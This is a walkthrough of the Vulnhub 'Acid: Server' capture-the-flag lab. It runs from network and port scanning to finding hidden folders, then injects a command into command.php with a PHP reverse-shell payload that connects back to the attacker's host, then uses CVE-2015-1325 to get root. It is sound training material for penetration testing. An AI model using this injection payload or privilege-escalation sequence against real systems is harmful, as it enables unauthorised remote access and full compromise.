[Vulnhub]Acid: Server

Acid:Server is created by Avinash Kumar Thapa

More information and OVA file download please check here.

Links

watch video online:

Attacker & Target

Attacker: Kali Linux (10.1.1.130/24)

Target: Acid: Server (10.1.1.132/24)

Vulnerability & Exploit

  • Hints stored in some pages' source code or title, otherwise dirbuster/wfuzz can be used to find hidden folders
  • Command injection vulnerability exists in /Challenge/Magic_Box/command.php, exploit it can obtain a reverse shell
  • Apport/Ubuntu - Local Root Race Condition exploit (CVE-2015-1325) exist, exploit it to get ROOT

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover the running services and open ports [unicornscan & nmap]
  • Web information gathering and interacting with the web server [firefox]
  • Brute force scan to find hidden path [dirbuster]
  • Found the hidden folder and a page which has command injection vulnerability, analyse it with burp suite and exploit it to get a reverse shell
  • Enumeration and found the server is vulnerable to CVE-2015-1325, exploit it to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.132 in this case).

1
2
3
4
5
6
7
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.132    00:0c:29:36:7b:18   VMware, Inc.
10.1.1.254    00:50:56:fb:ea:26   VMware, Inc.

10.1.1.132 is our Target!

Then run uniscornscan to detect opening ports on the target (unicornscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9
root@kali:~# us -H -msf -p 1-65535 -Iv -T4 10.1.1.132
adding 10.1.1.132/32 mode `TCPscan' ports `1-65535' pps 300
using interface(s) eth0
scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a little longer than 3 Minutes, 45 Seconds
connected 10.1.1.130:14028 -> 10.1.1.132:33447
TCP open 10.1.1.132:33447  ttl 64
sender statistics 291.2 pps with 65535 packets sent total
listener statistics 131074 packets recieved 0 packets droped and 0 interface drops
TCP open           unknown[33447]     from 10.1.1.132  ttl 64

From the result above, TCP port 33447 has been discovered.

Then I run NMAP scan to probe more detail information against the opening port.

1
2
3
4
5
6
7
Host is up (0.00029s latency).
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: /Challenge
MAC Address: 00:0C:29:36:7B:18 (VMware)

I found that apache 2.4.10 is running on port 33447, and the server OS is Ubuntu Linux.

Then I start up the firefox to have a close look the web application and found hidden path from title or dirbuster scan or decode the password on the bottom of source code.

The hidden folder is /Challenge

Then I keep using dirbuster to /Challenge/ folder and found some pages, one of them is cake.php which again, the title give us the clue to another hidden folder /Magic_Box

Keep running dirbuster to /Challenge/Magic_Box folder and found interesting php page command.php which has command injection vulnerability

Then by using burp proxy and tamper the request to exploit command injection vulnerability to get a shell, due to there is no wget in the target server, I use the following php command:

payload (the payload need to be URL encoded):

127.0.0.1; php -r '$sock=fsockopen("10.1.1.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Setting up NC to listen on port 4444, then send the payload to server and got a reverse shell with www-data limited privilege.

Then running some enumeration and poking around, I found the target server is Ubuntu 15.04, which is local privilege escape vulnerable to CVE-2015-1325

Compile and send the exploit to target server, then run it to get ROOT!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
www-data@acid:/tmp$ ./37088
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 2571
apport stopped, pid = 2572
getting pid 2571
current pid = 2570..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..2500..
** child: current pid = 2571
** child: executing /bin/su
Password: sleeping 2s..

checker: mode 4516
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..
success
# id
id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
  ____                            _         _       _   _                 
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
| |   / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                   
root@acid:/tmp# cd /root
cd /root
root@acid:~# ls
ls
flag.txt
root@acid:~# cat flag.txt
cat flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143


root@acid:~#
2015-09-03 19:36:37 +1000